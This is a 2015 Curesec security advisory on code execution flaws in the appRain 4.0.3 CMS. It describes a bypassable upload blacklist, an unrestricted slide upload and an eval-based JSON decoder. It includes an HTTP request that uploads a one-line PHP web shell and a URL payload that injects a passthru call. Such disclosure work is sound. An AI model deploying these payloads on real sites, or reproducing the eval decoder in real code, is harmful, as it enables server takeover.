appRain 4.0.3: Code Execution

Date: 2015-12-02 10:08:11

Security Advisory – Curesec Research Team

1. Introduction

Affected Product:	appRain 4.0.3
Fixed in:	not fixed
Fixed Version Link:	n/a
Vendor Website:	info@apprain.com
Vulnerability Type:	Code Execution
Remote Exploitable:	Yes
Reported to vendor:	10/02/2015
Disclosed to public:	12/02/2015
Release mode:	Full Disclosure
CVE:	requested, but not assigned
Credits	Tim Coen of curesec GmbH

2. Overview

appRain is described as a Content Management Framework written in PHP.

There are various components of appRain 4.0.3 that should not provide the possibility of code execution or arbitrary file upload but do allow it.

All of these issues are by default present in the admin area. It should be noted that admins already have code execution via a designated PHP file editor.

Still, the code of appRain is explicitly intended to be extended by its users, which means that components such as a seemingly secure file uploader, an image uploader, or a function decoding json should not lead to code execution.

3. Unrestricted Upload of File with Dangerous Type 1

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

The file upload uses a blacklist for the file extension to forbid the upload of files with dangerous type. The disallowed extensions are:
php,php3,php4,exe,pl,py,bat,sys,dev,sh

However, files that can be uploaded and that also lead to code execution are .htaccess, as well as files with extension pht, php5, and phtml.

The file upload can be found here:
http://localhost/apprain/admin/filemanager

An admin account is required to use the file manager. It should be noted that an admin already has code execution via the designated PHP file editor. Still, this is an access violation in the context of this component and will also be an issue if users reuse the varifyFileName function in different contexts, which is to be expected.

Code

/development/controllers/admin.php if(!App::Module('Filemanager')->varifyFileName($this->data['filemanager']['image']['name'])){ App::Module('Notification')->Push("File({$this->data['filemanager']['image']['name']}) is restricted to uploaded.","Error"); App::Config()->redirect("/admin/filemanager/upload"); } else { $path = App::Config()->filemanagerDir(DS); $data = App::Utility()->upload($this->data['filemanager']['image'],$path); App::Module('Notification')->Push("File({$data['file_name']}) uploaded successfully."); App::Config()->redirect("/admin/filemanager"); } /apprain/base/modules/filemanager.php public function varifyFileName($filename){ $restrictedExt = explode(',',app::__def()->sysConfig('FILE_MANAGER_RESTRICTED_EXT')); return !in_array(App::Utility()->getExt($filename),$restrictedExt); } /development/definition/system_configuration/config.xml: <value><![CDATA[php,php3,php4,exe,pl,py,bat,sys,dev,sh]]></value>

4. Unrestricted Upload of File with Dangerous Type 2

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When creating a new slide, the label suggests that only images with extensions "*.jpeg, *.gif" may be uploaded. However, arbitrary files can be uploaded, including .php or .pht files.

An admin account is required to create new slides. It should be noted that an admin already has code execution via the designated PHP file editor. Still, this is an access violation in the context of this component and may also be an issue if users reuse the involved functions in different contexts.

Proof of Concept

POST /apprain/information/manage/appslide/add HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=4d7rqc7hj3ej5j403nf4ktmq42 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------418924992299141519661615194 Content-Length: 1178 -----------------------------418924992299141519661615194 Content-Disposition: form-data; name="data[Option][title]" test -----------------------------418924992299141519661615194 Content-Disposition: form-data; name="data[Option][image]"; filename="test.pht" Content-Type: application/octet-stream <?php passthru($_GET['x']); -----------------------------418924992299141519661615194 Content-Disposition: form-data; name="data[Option][description]" <p>test</p> -----------------------------418924992299141519661615194 Content-Disposition: form-data; name="data[Option][status]" Active -----------------------------418924992299141519661615194 Content-Disposition: form-data; name="Button[button_save]" Save -----------------------------418924992299141519661615194 Content-Disposition: form-data; name="data[Information][id]" -----------------------------418924992299141519661615194 Content-Disposition: form-data; name="data[Information][type]" appslide -----------------------------418924992299141519661615194 Content-Disposition: form-data; name="data[Information][page]" -----------------------------418924992299141519661615194--

5. Possibly Code Execution

CVSS

High 7.6AV:N/AC:H/Au:N/C:C/I:C/A:C

Description

appRain is described as "Content Management Framework", and as such, it is to be expected that public functions are reused in different contexts and should thus be secure.

If the function to decode json is used as described in the documentation, it will be unsecure if user input is passed to it, which is a likely scenario. This is also how it seems to be used by deletegroupAction, which is currently not used anywhere. If a user actually uses either of these functions, the code would likely be vulnerable.

Proof of Concept

Use the function, for example by adding the following to app.php: $data = App::Module('Cryptography') ->jsonDecode('{"status":"Success","message":"' . $_GET['x'] . ' Updated successfully"}'); pre($data); Now an attacker can gain code execution: http://localhost/apprain/?x=");passthru("touch 'test.php'");$y=array("x"=>"

Code

/apprain/base/modules/cryptography.php public function jsonDecode($json) { // Author: walidator.info 2009 $comment = false; $out = '$x='; for ($i = 0; $i < strlen($json); $i++) { if (!$comment) { if ($json[$i] == '{') { $out .= ' array('; } else if ($json[$i] == '}') { $out .= ')'; } else if ($json[$i] == ':') { $out .= '=>'; } else { $out .= $json[$i]; } } else { $out .= $json[$i]; } if ($json[$i] == '"') { $comment = !$comment; } } eval($out . ';'); return $x; }

6. Solution

This issue was not fixed by the vendor.

7. Report Timeline

10/02/2015	Informed Vendor. Mailbox info@apprain.com is full, used security@apprain.com instead (no reply)
10/21/2015	Reminded Vendor of Disclosure Date
10/21/2015	Vendor anounces fix for 11/02/2015
11/04/2015	No fix released, extended public disclosure date to 11/11/2015
11/05/2015	Vendor asks for list of organizations that may help implementing fixes
11/11/2015	Replied that we do not have lists, and that we do not have the resources to implement fixes ourselves. Extended release date to 11/18/2015 and offered further extension if needed (no reply)
11/17/2015	CVE Requested (no reply)
11/24/2015	Reminded Vendor of release date, extended date to 12/02/2015 and offered extension if needed (no reply)
12/02/2015	Disclosed to public